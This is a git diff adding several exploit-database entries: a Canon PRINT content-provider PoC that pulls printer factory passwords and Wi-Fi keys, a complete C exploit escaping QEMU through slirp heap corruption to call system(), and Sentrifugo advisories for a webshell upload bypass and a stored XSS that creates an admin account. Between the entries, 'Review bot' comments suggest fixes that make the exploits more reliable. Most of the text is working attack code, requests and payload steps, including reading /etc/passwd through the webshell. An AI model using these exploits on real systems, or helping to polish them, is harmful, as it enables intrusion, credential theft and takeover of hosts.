diff --git a/exploits/android/local/47321.txt b/exploits/android/local/47321.txt new file mode 100644 index 000000000..9f51504eb --- /dev/null +++ b/exploits/android/local/47321.txt 
@@ -0,0 +1,129 @@ +# Exploit Title: Content Provider URI Injection on Canon PRINT 2.5.5 +(CVE-2019-14339) +# Date: 24th July, 2019 +# Exploit Author: 0x48piraj +# Vendor Homepage: https://www.usa.canon.com/internet/portal/us/home/explore/printing-innovations/mobile-printing/canon-print-app +# Software Link: https://play.google.com/store/apps/details?id=jp.co.canon.bsd.ad.pixmaprint +# +Exploit : https://github.com/0x48piraj/CVE-2019-14339 +# Version: Canon PRINT 2.5.5 +# Tested on: Android 8.0.0 +# CVE : CVE-2019-14339 + +The ContentProvider in the Canon PRINT 2.5.5 application for Android +does not properly restrict data access. This allows an attacker's +malicious application to obtain sensitive information including +factory passwords for administrator web-interface and WPA2-PSK key. +The mobile application contains unprotected exported content providers +('IJPrinterCapabilityProvider' in android/AndroidManifest.xml) that +discloses sensitive application’s data under certain conditions. To +securely export the content provider, one should restrict access to it +by setting up android:protectionLevel or android:grantUriPermissions +attributes in Android Manifest file. 
+ +-- Proof-of-concept code (Java) + +-- + +package cannon.print.pwn; + +import android.database.Cursor; +import android.net.Uri; +import android.support.v7.app.AppCompatActivity; +import android.os.Bundle; +import android.view.View; +import android.widget.Button; +import android.widget.TextView; +import android.widget.Toast; +import org.apache.commons.lang3.StringUtils; // +https://stackoverflow.com/a/50198499 + +public class MainActivity extends AppCompatActivity { + + Button PwnBtn; + + @Override + protected void onCreate(Bundle savedInstanceState) { + super.onCreate(savedInstanceState); + setContentView(R.layout.activity_main); + PwnBtn = (Button) findViewById(R.id.button); + PwnBtn.setOnClickListener(new View.OnClickListener() { + @Override + public void onClick(View view) { + Toast.makeText(getApplicationContext(), "Payload +triggered ...", Toast.LENGTH_SHORT).show(); + Uri cannonURI = +Uri.parse("content://canon.ij.printer.capability.data/"); + Cursor cursor = getContentResolver().query(cannonURI, +null, null, null, null); + int count = cursor.getCount(); + TextView data=(TextView)findViewById(R.id.data); + data.setText(String.valueOf(count)); + cursor.moveToFirst(); + String tempstr = " "; + tempstr =" "+tempstr +"\t"+ cursor.getString(0) + "\t\t\t" + + cursor.getString(1) + "\t\t\t" + cursor.getString(2); + String dpw = StringUtils.substringBetween(tempstr, +"", ""); + String dmac = cursor.getString(4); + String mdeviceid = cursor.getString(13); // raw + String dtype = StringUtils.substringBetween(mdeviceid, +";CLS:", ";DES"); + String timestamp = cursor.getString(15); // ticks, +device last used + String dclass = StringUtils.substringBetween(tempstr, +"", ""); + String dmodel = StringUtils.substringBetween(tempstr, +"", ""); + String dserial = StringUtils.substringBetween(tempstr, +"", ""); + String dfmver = StringUtils.substringBetween(tempstr, +"", ""); + String dservice = +StringUtils.substringBetween(tempstr, "", +""); + /* More juicy data + String 
denv = StringUtils.substringBetween(tempstr, +"", ""); + String dpapertype = +StringUtils.substringBetween(tempstr, "", +""); + String dformats = +StringUtils.substringBetween(tempstr, "", +""); + */ + String fout = String.format("Device Type : %s\nDevice +Class : %s\nDevice Model : %s\nDevice Serial : %s\nDevice MAC Address +: %s\nDevice Factory Password : %s\nDevice Firmware Version : +%s\nDevice Services : %s\nDevice Last Used : %s\n", dtype, dclass, +dmodel, dserial, dmac, dpw, dfmver, dservice, timestamp); + data.setText(fout); + } + }); + } +} + +-- Proof-of-concept python script over ADB -- + +import subprocess, datetime, sys + +def ext(out, var, rw=';'): + return out.split(var)[1].split(rw)[0] + +print("[#] Make sure you've connected the target device w/ adb ...") +print("[*] Running the exploit using adb ...\n\n") +out = subprocess.getoutput("adb shell content query --uri content://canon.ij.printer.capability.data/") + +if "" not in out: + print("[!] Error: Couldn't fetch data from adb ...") + sys.exit(1) + +varz = [";CLS:", ";MDL:", ";DES:", ";VER:", ";PSE:"] # +factory_pw_check = +out.split("")[1].split('')[0] +prmz = ["Class", "Model", "Description", "Firmware Version", "Factory Password"] +for prm, var in zip(prmz, varz): + print(" -- Device %s : %s" % (prm, ext(out, var))) +print(" -- Device MAC Address : {}".format(ext(out, 'mmacaddress=', ','))) +print(" -- Device Last Used : %s" % (datetime.timedelta(microseconds = +int(ext(out,', timestamp=', ', '))/10))) \ No newline at end of file diff --git a/exploits/linux/remote/47320.c b/exploits/linux/remote/47320.c new file mode 100644 index 000000000..2f7cf41b1 --- /dev/null +++ b/exploits/linux/remote/47320.c 
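Review bot: The Java PoC dereferences the cursor returned by `getContentResolver().query(cannonURI, null, null, null, null)` straight away (`cursor.getCount()`, `cursor.moveToFirst()`) and never closes it; `query()` returns null when the provider is absent or rejects the caller, so the click handler dies with an NPE instead of reporting failure, and on success the cursor leaks. Guard with `if (cursor == null || !cursor.moveToFirst()) { data.setText("provider returned no rows"); return; }` and wrap the `getString` reads in `try { ... } finally { cursor.close(); }`. The remediation sentence is also imprecise: `android:protectionLevel` belongs on a `<permission>` declaration and `android:grantUriPermissions` widens rather than restricts access; the fix for this `<provider>` is `android:exported="false"`, or an `android:readPermission`/`android:permission` backed by a signature-level permission. The Python helper `ext()` likewise indexes `out.split(var)[1]` unguarded and raises IndexError when a field marker is missing from the adb output, and the `if "" not in out` check is always false as written, so the error branch can never fire.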
@@ -0,0 +1,656 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +#define die(x) do { \ + perror(x); \ + exit(EXIT_FAILURE); \ + }while(0); + +// * * * * * * * * * * * * * * * Constans * * * * * * * * * * * * * * * * * * + +#define SRC_ADDR "10.0.2.15" +#define DST_ADDR "10.0.2.2" + +#define INTERFACE "ens3" + +#define ETH_HDRLEN 14 // Ethernet header length +#define IP4_HDRLEN 20 // IPv4 header length +#define ICMP_HDRLEN 8 // ICMP header length for echo request, excludes data +#define MIN_MTU 12000 + +// * * * * * * * * * * * * * * * QEMU Symbol offset * * * * * * * * * * * * * * * * * * + +#define SYSTEM_PLT 0x029b290 +#define QEMU_CLOCK 0x10e8200 +#define QEMU_TIMER_NOTIFY_CB 0x2f4bff +#define MAIN_LOOP_TLG 0x10e81e0 +#define CPU_UPDATE_STATE 0x488190 + +// Some place in bss which is not used to craft fake stucts +#define FAKE_STRUCT 0xf43360 + +// * * * * * * * * * * * * * * * QEMU Structs * * * * * * * * * * * * * * * * * * + +struct mbuf { + struct mbuf *m_next; /* Linked list of mbufs */ + struct mbuf *m_prev; + struct mbuf *m_nextpkt; /* Next packet in queue/record */ + struct mbuf *m_prevpkt; /* Flags aren't used in the output queue */ + int m_flags; /* Misc flags */ + + int m_size; /* Size of mbuf, from m_dat or m_ext */ + struct socket *m_so; + + char * m_data; /* Current location of data */ + int m_len; /* Amount of data in this mbuf, from m_data */ + + void *slirp; + char resolution_requested; + u_int64_t expiration_date; + char *m_ext; + /* start of dynamic buffer area, must be last element */ + char * m_dat; +}; + + +struct QEMUTimer { + int64_t expire_time; /* in nanoseconds */ + void *timer_list; + void *cb; + void *opaque; + void *next; + int scale; +}; + + +struct QEMUTimerList { + void * clock; + char active_timers_lock[0x38]; + struct QEMUTimer *active_timers; + struct QEMUTimerList *le_next; /* next element */ \ + 
struct QEMUTimerList **le_prev; /* address of previous next element */ \ + void *notify_cb; + void *notify_opaque; + + /* lightweight method to mark the end of timerlist's running */ + size_t timers_done_ev; +}; + + + +// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * * + +int raw_socket; +int recv_socket; +int spray_id; +int idx; +char mac[6]; + +void * code_leak; +void * heap_leak; + +void *Malloc(size_t size) { + void * ptr = calloc(size,1); + if (!ptr) { + die("malloc() failed to allocate"); + } + return ptr; +} + +unsigned short in_cksum(unsigned short *ptr,int nbytes) { + +register long sum; /* assumes long == 32 bits */ + u_short oddbyte; + register u_short answer; /* assumes u_short == 16 bits */ + + /* + * Our algorithm is simple, using a 32-bit accumulator (sum), + * we add sequential 16-bit words to it, and at the end, fold back + * all the carry bits from the top 16 bits into the lower 16 bits. + */ + + sum = 0; + while (nbytes > 1) { + sum += *ptr++; + nbytes -= 2; +} + +/* mop up an odd byte, if necessary */ +if (nbytes == 1) { +oddbyte = 0; /* make sure top half is zero */ +*((u_char *) &oddbyte) = *(u_char *)ptr; /* one byte only */ +sum += oddbyte; +} + +/* + * Add back carry outs from top 16 bits to low 16 bits. 
+ */ + +sum = (sum >> 16) + (sum & 0xffff); /* add high-16 to low-16 */ +sum += (sum >> 16); /* add carry */ +answer = ~sum; /* ones-complement, then truncate to 16 bits */ +return(answer); +} + +void hex_dump(char *desc, void *addr, int len) +{ + int i; + unsigned char buff[17]; + unsigned char *pc = (unsigned char*)addr; + if (desc != NULL) + printf ("%s:\n", desc); + for (i = 0; i < len; i++) { + if ((i % 16) == 0) { + if (i != 0) + printf(" %s\n", buff); + printf(" %04x ", i); + } + printf(" %02x", pc[i]); + if ((pc[i] < 0x20) || (pc[i] > 0x7e)) { + buff[i % 16] = '.'; + } else { + buff[i % 16] = pc[i]; + } + buff[(i % 16) + 1] = '\0'; + } + while ((i % 16) != 0) { + printf(" "); + i++; + } + printf(" %s\n", buff); +} + +char * ethernet_header(char * eth_hdr){ + + /* src MAC : 52:54:00:12:34:56 */ + memcpy(ð_hdr[6],mac,6); + + // Next is ethernet type code (ETH_P_IP for IPv4). + // http://www.iana.org/assignments/ethernet-numbers + eth_hdr[12] = ETH_P_IP / 256; + eth_hdr[13] = ETH_P_IP % 256; + return eth_hdr; +} + +void ip_header(struct iphdr * ip ,u_int32_t src_addr,u_int32_t dst_addr,u_int16_t payload_len, + u_int8_t protocol,u_int16_t id,uint16_t frag_off){ + + /* rfc791 */ + ip->ihl = IP4_HDRLEN / sizeof (uint32_t); + ip->version = 4; + ip->tos = 0x0; + ip->tot_len = htons(IP4_HDRLEN + payload_len); + ip->id = htons(id); + ip->ttl = 64; + ip->frag_off = htons(frag_off); + ip->protocol = protocol; + ip->saddr = src_addr; + ip->daddr = dst_addr; + ip->check = in_cksum((unsigned short *)ip,IP4_HDRLEN); +} + +void icmp_header(struct icmphdr *icmp, char *data, size_t size) { + + /* rfc792 */ + icmp->type = ICMP_ECHO; + icmp->code = 0; + icmp->un.echo.id = htons(0); + icmp->un.echo.sequence = htons(0); + if (data) { + char * payload = (char * )icmp+ ICMP_HDRLEN; + memcpy(payload, data, size); + } + + icmp->checksum = in_cksum((unsigned short *)icmp, ICMP_HDRLEN + size); + +} + +void send_pkt(char *frame, u_int32_t frame_length) { + + struct sockaddr_ll sock; + 
sock.sll_family = AF_PACKET; + sock.sll_ifindex = idx; + sock.sll_halen = 6; + memcpy (sock.sll_addr, mac, 6 * sizeof (uint8_t)); + + if(sendto(raw_socket,frame,frame_length,0x0,(struct sockaddr *)&sock, + sizeof(sock))<0) + die("sendto()"); +} + +void send_ip4(uint32_t id,u_int32_t size,char * data,u_int16_t frag_off) { + + u_int32_t src_addr, dst_addr; + src_addr = inet_addr(SRC_ADDR); + dst_addr = inet_addr(DST_ADDR); + + char * pkt = Malloc(IP_MAXPACKET); + struct iphdr * ip = (struct iphdr * ) (pkt + ETH_HDRLEN); + + ethernet_header(pkt); + u_int16_t payload_len = size; + ip_header(ip,src_addr,dst_addr,payload_len,IPPROTO_ICMP,id,frag_off); + + if(data) { + char * payload = (char *)pkt + ETH_HDRLEN + IP4_HDRLEN; + memcpy(payload, data, payload_len); + } + + u_int32_t frame_length = ETH_HDRLEN + IP4_HDRLEN + payload_len; + send_pkt(pkt,frame_length); + free(pkt); +} + +void send_icmp(uint32_t id,u_int32_t size,char * data,u_int16_t frag_off) { + + char * pkt = Malloc(IP_MAXPACKET); + struct icmphdr * icmp = (struct icmphdr * )(pkt); + + if(!data) + data = Malloc(size); + icmp_header(icmp,data,size); + + u_int32_t len = ICMP_HDRLEN + size; + send_ip4(id,len,pkt,frag_off); + free(pkt); + } + +// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * * + +void initialize() { + int sd; + struct ifreq ifr; + char interface[40]; + int mtu; + + srand(time(NULL)); + strcpy (interface, INTERFACE); + + // Submit request for a socket descriptor to look up interface. + if ((sd = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { + die("socket() failed to get socket descriptor for using ioctl()"); + } + // Use ioctl() to get interface maximum transmission unit (MTU). 
+ memset (&ifr, 0, sizeof (ifr)); + strcpy (ifr.ifr_name, interface); + if (ioctl (sd, SIOCGIFMTU, &ifr) < 0) { + die("ioctl() failed to get MTU "); + } + mtu = ifr.ifr_mtu; + printf ("MTU of interface %s : %i\n", interface, mtu); + if (mtu < MIN_MTU) { + printf("Run\n$ ip link set dev %s mtu 12000\n",interface); + die(""); + } + + // Use ioctl() to look up interface name and get its MAC address. + memset (&ifr, 0, sizeof (ifr)); + snprintf (ifr.ifr_name, sizeof (ifr.ifr_name), "%s", interface); + if (ioctl (sd, SIOCGIFHWADDR, &ifr) < 0) { + die("ioctl() failed to get source MAC address "); + } + memcpy (mac, ifr.ifr_hwaddr.sa_data, 6 * sizeof (uint8_t)); + printf ("MAC %s :", interface); + for (int i=0; i<5; i++) { + printf ("%02x:", mac[i]); + } + printf ("%02x\n", mac[5]); + + // Use ioctl() to look up interface index which we will use to + // bind socket descriptor sd to specified interface with setsockopt() since + // none of the other arguments of sendto() specify which interface to use. + memset (&ifr, 0, sizeof (ifr)); + snprintf (ifr.ifr_name, sizeof (ifr.ifr_name), "%s", interface); + if (ioctl (sd, SIOCGIFINDEX, &ifr) < 0) { + die("ioctl() failed to find interface "); + } + + close (sd); + printf ("Index for interface %s : %i\n", interface, ifr.ifr_ifindex); + idx = ifr.ifr_ifindex; + + if((raw_socket = socket(PF_PACKET, SOCK_RAW, htons (ETH_P_ALL)))==-1) + die("socket() failed to obtain raw socket"); + + + /* Bind socket to interface index. 
*/ + if (setsockopt (raw_socket, SOL_SOCKET, SO_BINDTODEVICE, &ifr, sizeof (ifr)) < 0) { + die("setsockopt() failed to bind to interface "); + } + + printf("Initialized socket discriptors\n"); +} + + +void spray(uint32_t size, u_int32_t count) { + printf("Spraying 0x%x x ICMP[0x%x]\n",count,size); + int s; + u_int16_t frag_off; + char * data; + + for (int i = 0; i < count; i++) { + send_icmp(spray_id + i,size, NULL, IP_MF); + } +} + +void arbitrary_write(void *addr, size_t addrlen, char *payload, size_t size, + size_t spray_count) { + + spray(0x8, spray_count); + + + size_t id = spray_id + spray_count; + // Target + size_t target_id = id++; + send_ip4(target_id, 0x8, NULL, IP_MF); + + + // Padding + send_ip4(id++, 0x8, NULL, IP_MF); + send_ip4(id++, 0x8, NULL, IP_MF); + + // Piviot Point + size_t hole_1 = id++; + send_ip4(hole_1, 0x8, NULL, IP_MF); + + + // Padding + send_ip4(id++, 0xC30, NULL, IP_MF); + + // For creating hole + size_t hole_2 = id++; + send_ip4(hole_2, 0x8, NULL, IP_MF); + + // To prevent consolidation + send_ip4(id++, 0x8, NULL, IP_MF); + + // This should create the fist hole + send_ip4(hole_1, 0x8, NULL, 0x1); + + // This should create the second hole + send_ip4(hole_2, 0x8, NULL, 0x1); + + int m_data_off = -0x70; + int m_len = m_data_off; + addr = (void *)((size_t)addr + ((m_len * -1) - addrlen)); + if (addrlen != 0x8) { + m_len -= (0x8 - addrlen); + } + + size_t vuln_id = id++; + + char * pkt = Malloc(IP_MAXPACKET); + memset(pkt,0x0,IP_MAXPACKET); + struct iphdr * ip = (struct iphdr * ) (pkt + ETH_HDRLEN); + ethernet_header(pkt); + + u_int16_t pkt_len = 0xc90; + ip_header(ip,m_len,0x0,pkt_len,IPPROTO_ICMP,vuln_id,IP_MF); + u_int32_t frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len; + + // The mbuf of this packet will be placed in the second hole and + // m_ext buff will be placed on the first hole, We will write wrt + // to this. 
+ send_pkt(pkt,frame_length); + + memset(pkt,0x0,IP_MAXPACKET); + ip = (struct iphdr * ) (pkt + ETH_HDRLEN); + ethernet_header(pkt); + pkt_len = 0x8; + ip_header(ip,m_len,0x0,pkt_len,IPPROTO_ICMP,vuln_id,0x192); + frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len; + + // Trigger the bug to change target's m_len + send_pkt(pkt,frame_length); + + + // Underflow and write, to change m_data + char addr_buf[0x8] = {0}; + if (addrlen != 0x8) { + memcpy(&addr_buf[(0x8-addrlen)],(char *)&addr,addrlen); + } else { + memcpy(addr_buf,(char *)&addr,8); + } + send_ip4(target_id, 0x8, addr_buf, 0x1|IP_MF); + send_ip4(target_id, size, payload, 0x2); + + hex_dump("Writing Payload ", payload, size); +} + + +void recv_leaks(){ + /* Prepare recv sd */ + /* Submit request for a raw socket descriptor to receive packets. */ + int recvsd, fromlen, bytes, status; + struct sockaddr from; + char recv_ether_frame[IP_MAXPACKET]; + struct iphdr *recv_iphdr = (struct iphdr *)(recv_ether_frame + ETH_HDRLEN); + struct icmphdr *recv_icmphdr = + (struct icmphdr *)(recv_ether_frame + ETH_HDRLEN + IP4_HDRLEN); + + for (;;) { + + memset(recv_ether_frame, 0, IP_MAXPACKET * sizeof(uint8_t)); + memset(&from, 0, sizeof(from)); + fromlen = sizeof(from); + if ((bytes = recvfrom(recv_socket, recv_ether_frame, IP_MAXPACKET, 0, + (struct sockaddr *)&from, (socklen_t *)&fromlen)) < + 0) { + status = errno; + // Deal with error conditions first. + if (status == EAGAIN) { // EAGAIN = 11 + printf("Time out\n"); + } else if (status == EINTR) { // EINTR = 4 + continue; // Something weird happened, but let's keep listening. + } else { + perror("recvfrom() failed "); + exit(EXIT_FAILURE); + } + } // End of error handling conditionals. + + // Check for an IP ethernet frame, carrying ICMP echo reply. If not, ignore + // and keep listening. 
+ if ((((recv_ether_frame[12] << 8) + recv_ether_frame[13]) == ETH_P_IP) && + (recv_iphdr->protocol == IPPROTO_ICMP) && + (recv_icmphdr->type == ICMP_ECHOREPLY) && (recv_icmphdr->code == 0) && + (recv_icmphdr->checksum == 0xffff)) { + hex_dump("Recieved ICMP Replay : ", recv_ether_frame, bytes); + + code_leak = (void *)(*((size_t *)&recv_ether_frame[0x40]) - CPU_UPDATE_STATE); + size_t *ptr = (size_t *)(recv_ether_frame + 0x30); + for (int i = 0; i < (bytes / 0x8); i++) { + if ((ptr[i] & 0x7f0000000000) == 0x7f0000000000) { + heap_leak = (void *)(ptr[i] & 0xffffff000000); + break; + } + } + + printf("Host Code Leak : %p\n", code_leak); + printf("Host Heap Leak : %p\n", heap_leak); + break; + } + } +} + +void leak() { + u_int32_t src_addr, dst_addr; + src_addr = inet_addr(SRC_ADDR); + dst_addr = inet_addr(DST_ADDR); + + /* Crafting Fake ICMP Packet For Leak */ + char * pkt = Malloc(IP_MAXPACKET); + struct iphdr * ip = (struct iphdr * ) (pkt + ETH_HDRLEN); + struct icmphdr * icmp = (struct icmphdr * )(pkt+ETH_HDRLEN+IP4_HDRLEN); + ethernet_header(pkt); + ip_header(ip,src_addr,dst_addr,ICMP_HDRLEN,IPPROTO_ICMP,0xbabe,IP_MF); + + ip->tot_len = ntohs(ip->tot_len) - IP4_HDRLEN; + ip->id = ntohs(ip->id); + ip->frag_off = htons(ip->frag_off); + + icmp_header(icmp,NULL,0x0); + char * data = (char *)icmp + ICMP_HDRLEN + 8; + size_t pkt_len = ETH_HDRLEN + IP4_HDRLEN + ICMP_HDRLEN; + + spray_id = rand() & 0xffff; + arbitrary_write((void * )(0xb00-0x20),3,pkt,pkt_len+4,0x100); + + // This is same as the arbitrary write function + spray_id = rand() & 0xffff; + spray(0x8, 0x20); + size_t id = spray_id + 0x20; + + size_t replay_id = id++; + send_ip4(replay_id, 0x100, NULL, IP_MF); + + // Target + size_t target_id = id++; + send_ip4(target_id, 0x8, NULL, IP_MF); + + + // Padding + send_ip4(id++, 0x8, NULL, IP_MF); + send_ip4(id++, 0x8, NULL, IP_MF); + + // Piviot Point + size_t hole_1 = id++; + send_ip4(hole_1, 0x8, NULL, IP_MF); + + + // Padding + send_ip4(id++, 0xC30, NULL, 
IP_MF); + + // For creating hole + size_t hole_2 = id++; + send_ip4(hole_2, 0x8, NULL, IP_MF); + + // Prevent Consolidation + send_ip4(id++, 0x8, NULL, IP_MF); + + // This should create the fist hole + send_ip4(hole_1, 0x8, NULL, 0x1); + + // This should create the second hole + send_ip4(hole_2, 0x8, NULL, 0x1); + + // Trigger the bug to change target's m_len + int m_data_off = -0xd50; + int m_len = m_data_off; + size_t * addr = (size_t * )(0xb00 - 0x20 + ETH_HDRLEN + 0xe + 6) ; + size_t addrlen = 0x3; + + if (addrlen != 0x8) { + m_len -= (0x8 - addrlen); + } + + size_t vuln_id = id++; + + memset(pkt,0x0,IP_MAXPACKET); + ip = (struct iphdr * ) (pkt + ETH_HDRLEN); + ethernet_header(pkt); + + pkt_len = 0xc90; + ip_header(ip,m_len,0x0,pkt_len,IPPROTO_ICMP,vuln_id,IP_MF); + u_int32_t frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len; + send_pkt(pkt,frame_length); + + + memset(pkt,0x0,IP_MAXPACKET); + ip = (struct iphdr * ) (pkt + ETH_HDRLEN); + ethernet_header(pkt); + pkt_len = 0x8; + ip_header(ip,m_len,0x0,pkt_len,IPPROTO_ICMP,vuln_id,0x192); + frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len; + send_pkt(pkt,frame_length); + + + // Underflow and write to change m_data + char addr_buf[0x8] = {0}; + if (addrlen != 0x8) { + memcpy(&addr_buf[(0x8-addrlen)],(char *)&addr,addrlen); + } else { + memcpy(addr_buf,(char *)&addr,8); + } + send_ip4(target_id, 0x8, addr_buf, 0x1); + + if ((recv_socket = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0) + die("socket() failed to obtain a receive socket descriptor"); + send_ip4(replay_id, 0x8, NULL, 0x20); + recv_leaks(); + + + char zero[0x28] = {0}; + spray_id = rand() & 0xffff; + printf("Cleaning Heap\n"); + arbitrary_write(heap_leak + (0xb00 - 0x20),3,zero,sizeof(zero),0x20); +} + + +void pwn() { + char payload[0x200] = {0}; + struct QEMUTimerList *tl = (struct QEMUTimerList *)payload; + struct QEMUTimer *ts = + (struct QEMUTimer *)(payload + sizeof(struct QEMUTimerList)); + + char cmd[] = "/usr/bin/gnome-calculator"; + 
memcpy((void *)(payload + sizeof(struct QEMUTimerList ) \ + +sizeof(struct QEMUTimer )), \ + (void *)cmd,sizeof(cmd)); + + void * fake_timer_list = code_leak + FAKE_STRUCT; + void * fake_timer = fake_timer_list + sizeof(struct QEMUTimerList); + + void *system = code_leak + SYSTEM_PLT; + void *cmd_addr = fake_timer + sizeof(struct QEMUTimer); + /* Fake Timer List */ + tl->clock = (void *)(code_leak + QEMU_CLOCK); + *(size_t *)&tl->active_timers_lock[0x30] = 0x0000000100000000; + tl->active_timers = fake_timer; + tl->le_next = 0x0; + tl->le_prev = 0x0; + tl->notify_cb = code_leak + QEMU_TIMER_NOTIFY_CB; + tl->notify_opaque = 0x0; + tl->timers_done_ev = 0x0000000100000000; + + /*Fake Timer structure*/ + ts->timer_list = fake_timer_list; + ts->cb = system; + ts->opaque = cmd_addr; + ts->scale = 1000000; + ts->expire_time = -1; + + spray_id = rand() & 0xffff; + size_t payload_size = + sizeof(struct QEMUTimerList) + sizeof(struct QEMUTimerList) + sizeof(cmd); + + printf("Writing fake structure : %p\n",fake_timer_list); + arbitrary_write(fake_timer_list,8,payload,payload_size,0x20); + + spray_id = rand() & 0xffff; + void * main_loop_tlg = code_leak + MAIN_LOOP_TLG; + printf("Overwriting main_loop_tlg %p\n",main_loop_tlg); + arbitrary_write(main_loop_tlg,8,(char *)&fake_timer_list,8,0x20); +} + +int main() { + initialize(); + leak(); + pwn(); + return 0; +} \ No newline at end of file diff --git a/exploits/php/webapps/47323.txt b/exploits/php/webapps/47323.txt new file mode 100644 index 000000000..091c27aec --- /dev/null +++ b/exploits/php/webapps/47323.txt 
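Review bot: `send_pkt` hands `sendto()` a `struct sockaddr_ll sock` with only `sll_family`, `sll_ifindex`, `sll_halen` and `sll_addr` assigned, so `sll_protocol`, `sll_hatype` and `sll_pkttype` carry whatever was on the stack; add `memset(&sock, 0, sizeof(sock));` before the assignments so the kernel sees a fully defined address. In `pwn()`, `payload_size` is computed as `sizeof(struct QEMUTimerList) + sizeof(struct QEMUTimerList) + sizeof(cmd)`, which looks like a copy-paste slip for `sizeof(struct QEMUTimerList) + sizeof(struct QEMUTimer) + sizeof(cmd)` and currently writes 64 extra zero bytes past the command string into the bss region at `FAKE_STRUCT`. `recv_leaks()` reads `*(size_t *)&recv_ether_frame[0x40]` and then scans `bytes / 8` words starting at offset 0x30 without checking `bytes` first, so a short reply produces a bogus `code_leak` from the zeroed buffer and a maximal one walks 0x30 bytes past the end of `recv_ether_frame`; guard with `if (bytes < 0x48) continue;` and bound the loop by `(bytes - 0x30) / 8`. `mac` is declared `char mac[6]`, so the `%02x` dump in `initialize()` prints bytes above 0x7f as `ffffffxx`; declare it `unsigned char mac[6]`.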
@@ -0,0 +1,64 @@
+# Exploit Title: Sentrifugo 3.2 - File Upload Restriction Bypass
+# Google Dork: N/A
+# Date: 8/29/2019
+# Exploit Author: creosote
+# Vendor Homepage: http://www.sentrifugo.com/
+# Version: 3.2
+# Tested on: Ubuntu 18.04
+# CVE : CVE-2019-15813
+
+Multiple File Upload Restriction Bypass vulnerabilities were found in Sentrifugo 3.2. This allows for an authenticated user to potentially obtain RCE via webshell.
+
+File upload bypass locations:
+
+/sentrifugo/index.php/mydetails/documents -- Self Service >> My Details >> Documents (any permissions needed)
+sentrifugo/index.php/policydocuments/add -- Organization >> Policy Documents (higher permissions needed)
+
+
+# POC
+
+1. Self Service >> My Details >> Documents >> add New Document (/sentrifugo/index.php/mydetails/documents)
+2. Turn Burp Intercept On
+3. Select webshell with valid extension - ex: shell.php.doc
+4. Alter request in the upload...
+ Update 'filename' to desired extension. ex: shell.php
+ Change content type to 'application/x-httpd-php'
+
+Example exploitation request:
+
+====================================================================================================
+
+POST /sentrifugo/index.php/employeedocs/uploadsave HTTP/1.1
+Host: 10.42.1.42
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://10.42.1.42/sentrifugo/index.php/mydetails/documents
+X-Requested-With: XMLHttpRequest
+Content-Length: 494
+Content-Type: multipart/form-data; boundary=---------------------------205946976257369239535727507
+Cookie: PHPSESSID=vr0ik0kof2lpg0jlc9gp566qb5
+Connection: close
+
+-----------------------------205946976257369239535727507
+Content-Disposition: form-data; name="myfile"; filename="shell.php"
+Content-Type: application/x-httpd-php
+
+
+-----------------------------205946976257369239535727507
+Content-Disposition: form-data; name=""
+
+undefined
+-----------------------------205946976257369239535727507
+Content-Disposition: form-data; name=""
+
+undefined
+-----------------------------205946976257369239535727507--
+
+====================================================================================================
+
+5. With intercept still on, Save the document and copy the 'file_new_names' parmeter from the new POST request.
+6. Append above saved parameter and visit your new webshell
+ Ex: http://10.42.1.42/sentrifugo/public/uploads/employeedocs/1565996140_5_shell.php?cmd=cat /etc/passwd
\ No newline at end of file
diff --git a/exploits/php/webapps/47324.txt b/exploits/php/webapps/47324.txt
new file mode 100644
index 000000000..a99a23d17
--- /dev/null
+++ b/exploits/php/webapps/47324.txt
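Review bot: The example request has an empty body for the `myfile` part (nothing between `Content-Type: application/x-httpd-php` and the next boundary) and two further parts with `name=""`, so copying it verbatim uploads a zero-byte file; the PHP payload and the real field names should be spelled out, or a one-line note added if the tags were lost in rendering. `Content-Length: 494` will also be wrong once the filename and body are edited, which Burp silently fixes up but a raw replay will not. The advisory names the bypass but no mitigation; since step 6 shows the file executing directly from `public/uploads/employeedocs/`, a line such as `Remediation: validate the extension server-side against an allowlist, ignore the client-supplied Content-Type, and serve public/uploads/ with PHP execution disabled` would give operators something to act on.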
@@ -0,0 +1,62 @@ +# Exploit Title: Sentrifugo 3.2 - Persistent Cross-Site Scripting +# Google Dork: N/A +# Date: 8/29/2019 +# Exploit Author: creosote +# Vendor Homepage: http://www.sentrifugo.com/ +# Version: 3.2 +# Tested on: Ubuntu 18.04 +# CVE : CVE-2019-15814 + + +Multiple Stored XSS vulnerabilities were found in Sentrifugo 3.2. In most test cases session riding was also possible by utilizing the XSS vulnerability. This potentially allows for full account takeover. + +/sentrifugo/index.php/employee/edit/id/5 <--Attacker employee ID here. POC example pertains to this one. +/sentrifugo/index.php/feedforwardquestions/add +/sentrifugo/index.php/announcements/add + +# Proof of Concept + +A low privileged user can insert a stored XSS referencing a crafted js file that would ride a session of an admin user to create an additional admin user. Logged in as the low priv user, insert the following in "Certificate Description" (Self Service >> My Details >> Training and Certificate Details) + + + +Add the following 'add-admin-user.js' file hosted on your attacking machine. This request will need to be customized per instance of Sentrifugo. + +A few crafting notes: + +- 'employeeId' - this can be found in the users profile. +- 'employeeNumId' - this can be an arbitrary number as long as it does not exist. +- 'emprole' - in this test case '2_1' was the Administrator role +- 'emp_status_id' - based off "Contractor", "Full-Time", etc. Contractor is '6' in this case. +- 'emailaddress' - by default the initial password is sent via email, so this will need to be valid in order to login. 
